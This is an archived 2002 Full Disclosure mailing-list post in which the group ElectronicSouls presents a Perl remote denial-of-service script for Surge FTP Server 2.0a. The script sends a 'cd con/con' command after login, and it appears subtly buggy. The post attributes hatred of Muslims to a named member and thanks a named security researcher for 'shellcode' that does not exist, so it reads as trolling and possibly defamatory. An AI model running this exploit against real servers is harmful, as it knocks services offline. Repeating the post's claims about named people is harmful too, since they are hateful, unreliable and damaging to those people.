Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

[ElectronicSouls] - BuRn-X

From: es () hush com
Date: Fri, 29 Nov 2002 00:23:53 -0800

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

Our esteemed senior member, BuRn-X, is a well-respected security
professional in New York City.  He hates Muslims, and can write better
code than Brian McWilliams.

Here's an example.

# cat surgeftp-dos.pl
#!/usr/bin/perl
# [ElectronicSouls]
# Surge FTP Server 2.0a Remote DoS
# Coded by BuRn-X
# Just another lame windows DoS ;-)

print "!! ElectronicSouls Presents: !!\n";
print "SurgeFTP-DoS.pl: Remote DoS for SurgeFTP 2.0a\n";

$ARGC=@ARGV;
if ($ARGC <3) {
      print "./surgeftp-dos.pl <host> <port> <username> <password>\n";
        exit;
}
use Socket;


my($remote,$port,$inetaddr,$portaddr,$protocol);
$remote=$ARGV[0];
$port =$ARGV[1];
$username=$ARGV[2];
$pass=$ARGV[3];

print "[*] Sending Exploitation to $remote \n";
$inetaddr = inet_aton($remote) or die "Got Fucked Up: $!";
$portaddr = sockaddr_in($port, $iaddr) or die "Got Fucked Up: $!";
$protocol = getprotobyname('tcp') or die "Got Fucked Up: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $protocol) or die "Got Fucked Up: $!";
connect(SOCK, $portaddr) or die "Got Fucked Up: $!";;
$msg = "USER $username\n";
send(SOCK, $msg, 0) or die "Cant send packet: $!";
$msg = "PASS $pass\n";
send(SOCK, $msg, 0) or die "Cant send packet: $!";
$msg = "cd con/con\n";
send(SOCK, $msg, 0) or die "Cant send packet: $!";
$msg = "quit\n";

print "[*]: Done! \n";
exit;

#

Thanks to Chris Wysopal for helping out with the shellcode.

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Pass me the doobs."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nJCkMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltreUAoKhQCNWzypq1
75o/+mZdlb1OqPX6AKCtRmCySmKmNzw5zCG1vHoRvaCfnQ==
=WxTD
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: